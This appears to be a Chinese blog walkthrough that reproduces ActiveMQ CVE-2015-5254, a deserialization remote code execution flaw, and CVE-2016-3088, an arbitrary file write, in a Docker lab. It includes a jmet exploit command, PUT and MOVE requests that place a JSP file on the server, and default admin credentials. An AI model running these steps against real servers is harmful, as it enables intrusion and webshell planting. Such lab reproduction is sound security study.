环境:docker
ActiveMQ
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
背景简介
ActiveMQ Web控制台分为三个应用程序:admin,api和文件服务器,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。
文件服务器是RESTful API接口。我们可以通过HTTP请求(例如GET,PUT和DELETE)读写存储在其中的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件但后来发现的缺陷:
使用率不高
文件操作容易产生漏洞
因此,ActiveMQ默认在5.12.x〜5.13.x中关闭文件服务器应用程序(您可以在conf / jetty.xml中打开它)。在5.14.0之后,文件服务器应用程序将被完全删除。在测试过程中,应注意ActiveMQ的版本。
ActiveMQ反序列化漏洞(远程命令执行)
CVE-2015-5254复现
拉好环境访问一下http://127.0.0.1:8161/,admin/admin登录
下载jmet工具
cd /opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
执行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.5.128 61616
此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://127.0.0.1:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:
点击查看这条消息即可触发命令执行
进入容器查看是否有新创建的success文件
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
漏洞简介
此漏洞出现在Fileserver应用程序中,漏洞原理实际上很简单,即文件服务器支持写入文件(但不解析JSP),同时支持移动文件(MOVE请求)。因此,我们只需要编写一个文件,然后使用移动请求将其移动到任何位置,就会导致任意文件写入漏洞。
查看路径
http://192.168.5.128:8161/admin/test/systemProperties.jsp
PUT方式写文件
PUT /fileserver/2.txt HTTP/1.1
移动到解析目录
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
访问写入的文件http://192.168.5.128:8161/api/s.jsp
1142
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
